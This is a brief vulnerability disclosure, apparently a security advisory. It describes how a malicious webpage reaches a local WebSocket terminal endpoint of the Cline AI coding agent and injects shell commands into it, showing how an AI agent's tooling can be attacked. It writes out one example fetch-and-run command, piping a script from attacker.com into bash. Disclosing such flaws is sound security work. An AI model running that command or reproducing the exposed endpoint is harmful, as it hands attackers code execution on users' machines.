What happened
A malicious webpage connects to ws://127.0.0.1:3484/api/terminal/io and injects arbitrary shell commands (e.g., curl https://attacker.com/shell.sh | bash) directly into the Cline agent’s terminal PTY — no user interaction required beyond visiting the page.